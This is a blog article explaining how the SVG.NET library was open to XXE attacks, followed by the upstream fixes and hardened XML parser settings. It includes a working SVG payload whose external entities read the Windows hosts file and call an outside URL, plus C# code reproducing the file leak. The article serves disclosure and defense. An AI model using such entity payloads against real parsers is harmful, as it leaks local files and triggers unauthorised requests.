Sergey Vasiliev

Feb 18 2022

Tags:

#CSharp #Security

Why does my app send network requests when I open an SVG file?

About the XXE attack
- Compromised data
- Insecurely configured XML parser
Problem fixes
How to protect yourself?
Conclusion

You decided to make an app that works with SVG. Full of enthusiasm, you picked some libraries and successfully built the application. But suddenly you find that the app is sending strange network requests, and data is leaking from the host machine. How so?

In today's world, you can have a library for every occasion. So, let's not reinvent the wheel for our application and take a ready-made solution. For example, the SVG.NET library. The source code of the project is available on GitHub. SVG.NET is distributed as a NuGet package, which comes in handy if you want to add the library to the project. By the way, according to the project's page in NuGet Gallery, the library has 2.5 million downloads — impressive!

Let's look at a synthetic code example of the application described above:

void ProcessSvg()
{
  using var svgStream = GetSvgFromUser();    
  var svgDoc = SvgDocument.Open<SvgDocument>(svgStream);    
  
  // SVG document processing...

  SendSvgToUser(svgDoc);
}

The program's logic is simple:

- We get a picture from a user. It doesn't matter how we get it.
- An instance of the SvgDocument type is created. Then some actions are performed on this instance, for example, some transformations.
- The app sends the modified picture back to the user.

In this case, the implementation of the GetSvgFromUser and SendSvgToUser methods is not that important. Let's assume that the first method receives the picture over the network, and the second one sends it back.

What is hidden behind "SVG document processing..."? And again, it's not that important to us what's hidden there, so... the application won't perform any actions.

In fact, we just upload the image and get it back. It seems that there is nothing complicated. But it's enough for strange things to start happening. :)

For our experiments, let's take a specially prepared SVG file. It looks like the logo of the PVS-Studio analyzer. Let's see how the logo looks in the browser to make sure that everything is fine with it.

So, no problems with the logo. Next, let's upload it to the app. The application doesn't perform any actions (let me remind you that nothing is hidden behind the comment in the code above). The app just sends the SVG file back to us.

After that, we open the received file and, as expected, see the same picture.

The most interesting thing happened behind the scenes (during the SvgDocument.Open<T> method call).

First, the app sent an unplanned request to pvs-studio.com. You can see that, for example, by monitoring the network activity of the application.

And second, the user of the app received the hosts file from the machine on which the SVG was opened.

How? Where is the hosts file? Let's look at the text representation of the SVG file received from the application. Let me remove unnecessary parts so that they do not distract us.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg .... >
<svg ....>
  <style type="text/css">
    ....
  </style>
  <polygon .... />
  <polygon .... />
  <polygon .... />
  <polygon .... />
  <polygon># Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
#
# localhost name resolution is handled within DNS itself.
#   127.0.0.1       localhost
#   ::1             localhost
#
# A special comment indicating that XXE attack was performed successfully.
#</polygon>
</svg>

Here is the hosts file from the machine — carefully hidden in the SVG file without any external manifestations.

Where does the hosts content come from? Where does the additional network request come from? Well, let's figure it out.

About the XXE attack

Those who know about the XXE attack may have already figured out what's going on. If you haven't heard about XXE or have forgotten what it is, I strongly recommend reading the following article: "Vulnerabilities due to XML file processing: XXE in C# applications in theory and in practice". In that article, I explain what XXE is and cover the causes and consequences of the attack. You'll need this information to understand the rest of this article.

As a reminder, an XXE attack requires:

- user data that may be compromised;
- an XML parser that has an insecure configuration.

The attacker also benefits if the compromised data processed by the XML parser returns to them in some form.

In this case, "all the stars are aligned":

- compromised data is the SVG file that the user sends to the application;
- an insecurely configured XML parser: we have it inside the SVG processing library;
- the result of the parser's work is returned to the user in the form of the "processed" SVG file.

Compromised data

First, remember that the SVG format is based on XML. That means we can define and use XML entities in SVG files. Entities are exactly what an XXE attack needs.

Even though the "dummy" SVG file looks normal in the browser, it contains declarations of two entities:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE polygon [
  <!ENTITY queryEntity SYSTEM "https://files.pvs-studio.com/rules/ccr.xml">
  <!ENTITY hostsEntity SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<svg id="Layer_1" 
     data-name="Layer 1" 
     xmlns="http://www.w3.org/2000/svg" 
     viewBox="0 0 1967 1933.8">
  <style type="text/css">
    ....
  </style>
  ....
  <polygon>&queryEntity;</polygon>
  <polygon>&hostsEntity;</polygon>
</svg>

If the XML parser processes external entities, then:

- when processing queryEntity, it'll send a network request to files.pvs-studio.com;
- when processing hostsEntity, it'll substitute the contents of the hosts file for the entity reference.

It turns out to be a kind of SVG trap: the file looks normal when rendered, but there's something tricky inside.
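
The mechanism can be reproduced without SVG.NET. The following is a minimal sketch, assuming a plain XmlReader from System.Xml configured with DtdProcessing.Parse and an XmlUrlResolver. The ExternalEntityDemo class, its methods, and the temporary file that stands in for the hosts file are hypothetical names introduced only for this illustration.

```csharp
using System;
using System.IO;
using System.Text;
using System.Xml;

// Illustration only: this is not SVG.NET code, and all names are hypothetical.
public static class ExternalEntityDemo
{
    // Parses the document with external entities enabled
    // and returns the concatenated text nodes.
    public static string ReadText(string xml)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Parse, // entity declarations are processed
            XmlResolver = new XmlUrlResolver()   // external resources are fetched
        };

        var text = new StringBuilder();
        using var input = new StringReader(xml);
        using var reader = XmlReader.Create(input, settings);
        while (reader.Read())
        {
            if (reader.NodeType == XmlNodeType.Text)
                text.Append(reader.Value);
        }
        return text.ToString();
    }

    // Writes 'secret' to a temporary file (a stand-in for the hosts file)
    // and parses a document whose entity points at that file.
    public static string LeakTempFile(string secret)
    {
        string path = Path.GetTempFileName();
        try
        {
            File.WriteAllText(path, secret);
            string xml =
                "<?xml version=\"1.0\"?>\n" +
                "<!DOCTYPE svg [\n" +
                $"  <!ENTITY fileEntity SYSTEM \"{new Uri(path).AbsoluteUri}\">\n" +
                "]>\n" +
                "<svg><polygon>&fileEntity;</polygon></svg>";
            return ReadText(xml);
        }
        finally
        {
            File.Delete(path);
        }
    }
}
```

Calling ExternalEntityDemo.LeakTempFile with some plain text should hand that text back as the content of the polygon element. This is the same kind of substitution that placed the hosts file into the SVG above.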

Insecurely configured XML parser

Remember that you have to pay a price for using external libraries. If you already had a list of possible negative consequences, here's one more item: potential security defects.

To create the SvgDocument instance, we used the Open<T> method. Its source code looks as follows:

public static T Open<T>(Stream stream) where T : SvgDocument, new()
{
  return Open<T>(stream, null);
}

This method, in turn, invokes another overload:

public static T Open<T>(Stream stream, Dictionary<string, string> entities) 
  where T : SvgDocument, new()
{
  if (stream == null)
  {
    throw new ArgumentNullException("stream");
  }

  // Don't close the stream via a dispose: that is the client's job.
  var reader = new SvgTextReader(stream, entities)
  {
    XmlResolver = new SvgDtdResolver(),
    WhitespaceHandling = WhitespaceHandling.Significant,
    DtdProcessing = SvgDocument.DisableDtdProcessing ? DtdProcessing.Ignore 
                                                     : DtdProcessing.Parse,
  };
  return Open<T>(reader);
}

Looking ahead, I'd like to say that Open<T>(reader) is where the SVG file is read and an instance of SvgDocument is created.

private static T Open<T>(XmlReader reader) where T : SvgDocument, new()
{
  ....
  T svgDocument = null;
  ....

  while (reader.Read())
  {
    try
    {
      switch (reader.NodeType)
      {
        ....
      }
    }
    catch (Exception exc)
    {
      ....
    }
  }
  ....
  return svgDocument;
}

The while (reader.Read()) and switch (reader.NodeType) constructions should be familiar to everyone who has worked with XmlReader. This is typical XML-reading code, so let's not dwell on it and return to how the XML parser is created.

var reader = new SvgTextReader(stream, entities)
{
  XmlResolver = new SvgDtdResolver(),
  WhitespaceHandling = WhitespaceHandling.Significant,
  DtdProcessing = SvgDocument.DisableDtdProcessing ? DtdProcessing.Ignore 
                                                   : DtdProcessing.Parse,
};

To understand whether the parser configuration is unsafe, you need to clarify the following points:

- what the SvgDtdResolver instance is;
- whether DTD processing is enabled.

And here I want to say once again: hail to Open Source! It's such an ineffable pleasure to have a chance to tinker with the code and understand how something works.

Let's start with the DtdProcessing property, which depends on SvgDocument.DisableDtdProcessing:

/// <summary>
/// Skip the Dtd Processing for faster loading of
/// svgs that have a DTD specified.
/// For Example Adobe Illustrator svgs.
/// </summary>
public static bool DisableDtdProcessing { get; set; }

Here's a static property whose value we haven't changed. The type constructor doesn't assign it either, so it keeps its default value, false. Accordingly, DtdProcessing takes the DtdProcessing.Parse value.

Let's move on to the XmlResolver property. Let's see what the SvgDtdResolver type is like:

internal class SvgDtdResolver : XmlUrlResolver
{
  /// ....
  public override object GetEntity(Uri absoluteUri, 
                                   string role, 
                                   Type ofObjectToReturn)
  {
    if (absoluteUri.ToString()
                   .IndexOf("svg", 
                            StringComparison.InvariantCultureIgnoreCase) > -1)
    {
      return Assembly.GetExecutingAssembly()
                     .GetManifestResourceStream("Svg.Resources.svg11.dtd");
    }
    else
    {
      return base.GetEntity(absoluteUri, role, ofObjectToReturn);
    }
  }
}

In fact, SvgDtdResolver is still the same XmlUrlResolver. The logic is just a little different for the case when absoluteUri contains the "svg" substring. Neither of the two entity URIs from our file contains it, so both are passed to base.GetEntity. And from the article about XXE, we remember that using an XmlUrlResolver instance to process external entities is fraught with security issues. It turns out the same is true of SvgDtdResolver.
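
For contrast, here is a sketch of a resolver that never falls back to base.GetEntity. It is not SVG.NET code and not the fix the project adopted. DenyExternalResolver and ResolverDemo are hypothetical names, and the sketch assumes a plain XmlReader rather than SvgTextReader.

```csharp
using System;
using System.IO;
using System.Text;
using System.Xml;

// Hypothetical resolver: refuses every external resource instead of
// delegating unknown URIs to XmlUrlResolver.
public sealed class DenyExternalResolver : XmlResolver
{
    public override object GetEntity(Uri absoluteUri,
                                     string role,
                                     Type ofObjectToReturn)
    {
        throw new XmlException("External resource blocked: " + absoluteUri);
    }
}

public static class ResolverDemo
{
    // Returns true and the collected text nodes if parsing succeeded,
    // false (and an empty string) if the parser rejected the document.
    public static bool TryReadText(string xml, out string text)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Parse,
            XmlResolver = new DenyExternalResolver()
        };

        var buffer = new StringBuilder();
        try
        {
            using var input = new StringReader(xml);
            using var reader = XmlReader.Create(input, settings);
            while (reader.Read())
            {
                if (reader.NodeType == XmlNodeType.Text)
                    buffer.Append(reader.Value);
            }
            text = buffer.ToString();
            return true;
        }
        catch (XmlException)
        {
            text = string.Empty;
            return false;
        }
    }
}
```

With such a resolver, a document that references an external entity is expected to fail to parse rather than pull in the file or make a request. A real library would more likely allow a small set of known resources, such as its bundled DTD, and block the rest.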

So, all the necessary conditions are met:

- DTD processing is enabled (the DtdProcessing property has the DtdProcessing.Parse value);
- the parser uses an unsafe resolver (the XmlResolver property refers to an instance of an unsafe SvgDtdResolver).

As a result, the created SvgTextReader object is potentially vulnerable to an XXE attack (as we've seen in practice — it is actually vulnerable).

Problem fixes

An issue was opened about this problem on the project page on GitHub — "Security: vulnerable to XXE attacks". A week later, another issue was opened. A PR was made for each issue: the first pull request, the second one.

In short, the fix is the following: the processing of external entities is turned off by default.

In the first PR, the ResolveExternalResources option was added. The option determines whether SvgDtdResolver processes external entities. Processing is disabled by default.

In the second PR, contributors added more code, and the boolean flag was replaced with an enumeration. By default, resolving external entities is still prohibited. There are more changes in the code. If you are interested, you can check them here.
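
The general idea of "external entities are off unless you ask for them" can be sketched with a plain XmlReader. This is an illustration under assumptions, not the code from the SVG.NET pull requests: HardenedReaderDemo and its members are hypothetical names. The first configuration keeps DTD parsing but sets XmlResolver to null, so external resources are not resolved. The second one prohibits DTDs altogether, so a document with a DOCTYPE is rejected with an XmlException.

```csharp
using System;
using System.IO;
using System.Text;
using System.Xml;

// Illustration only: hypothetical names, not SVG.NET code.
public static class HardenedReaderDemo
{
    // DTD is parsed, but nothing external is fetched.
    public static XmlReaderSettings NoExternalResources() => new XmlReaderSettings
    {
        DtdProcessing = DtdProcessing.Parse,
        XmlResolver = null
    };

    // Any DOCTYPE makes the reader throw an XmlException.
    public static XmlReaderSettings NoDtdAtAll() => new XmlReaderSettings
    {
        DtdProcessing = DtdProcessing.Prohibit,
        XmlResolver = null
    };

    // Builds a document whose entity points at the given URI.
    public static string BuildPayload(string entityUri) =>
        "<!DOCTYPE svg [\n" +
        $"  <!ENTITY fileEntity SYSTEM \"{entityUri}\">\n" +
        "]>\n" +
        "<svg><polygon>&fileEntity;</polygon></svg>";

    // Returns true and the collected text nodes if parsing succeeded,
    // false (and an empty string) if the parser rejected the document.
    public static bool TryReadText(string xml,
                                   XmlReaderSettings settings,
                                   out string text)
    {
        var buffer = new StringBuilder();
        try
        {
            using var input = new StringReader(xml);
            using var reader = XmlReader.Create(input, settings);
            while (reader.Read())
            {
                if (reader.NodeType == XmlNodeType.Text)
                    buffer.Append(reader.Value);
            }
            text = buffer.ToString();
            return true;
        }
        catch (XmlException)
        {
            text = string.Empty;
            return false;
        }
    }
}
```

Which of the two settings fits depends on the input: prohibiting DTDs is the stricter choice, but it also rejects legitimate files that merely carry a DOCTYPE declaration.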

If we update the 'Svg' package to a secure version, run it in the same application and with the same input data (i.e., with a dummy SVG file), we will get different results.

The application no longer performs network requests, nor does it "steal" files. If you look at the resulting SVG file, you may notice that the entities simply weren't processed:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg ...>
<svg version="1.1"
     ....>
  <style type="text/css">
    ....
  </style>
  ....
  <polygon />
  <polygon />
</svg>

How to protect yourself?

It depends on who wants to be on the safe side. :)

At the very least, you should know about XXE to be more careful when working with XML files. Of course, this knowledge won't protect against all dangerous cases (let's be honest, nothing will). However, it will give you some awareness of the possible consequences.

SAST solutions can help find similar problems in code. Actually, the list of things that can be caught by SAST is large. And XXE may well be on that list.

The situation is a bit different if you are using an external library, and not working with sources. For example, as in the case of our application, when the SVG library was added as a NuGet package. Here, SAST won't help since the tool does not have access to the source code of the library. Although if the static analyzer works with intermediate code (IL, for example), it still can detect the problem.

However, separate tools, SCA solutions, are used to check project dependencies. You can read the following article to learn about SCA tools. Such tools monitor the use of dependencies with known vulnerabilities and warn about them. In this case, of course, the database of vulnerable components plays an important role. The larger the database, the better.

And, of course, remember to update the software components. After all, in addition to new features and bug fixes, security defects are also fixed in new versions. For example, in SVG.NET, the security flaw dealt with in this article was closed in the 3.3.0 release.

Conclusion

As I've already said, XXE is a rather tricky thing. The instance described in this article is super tricky. Not only did it hide behind the processing of SVG files, it also "sneaked" into the application through a NuGet package. Who knows how many other vulnerabilities are hidden in different components and successfully exploited?
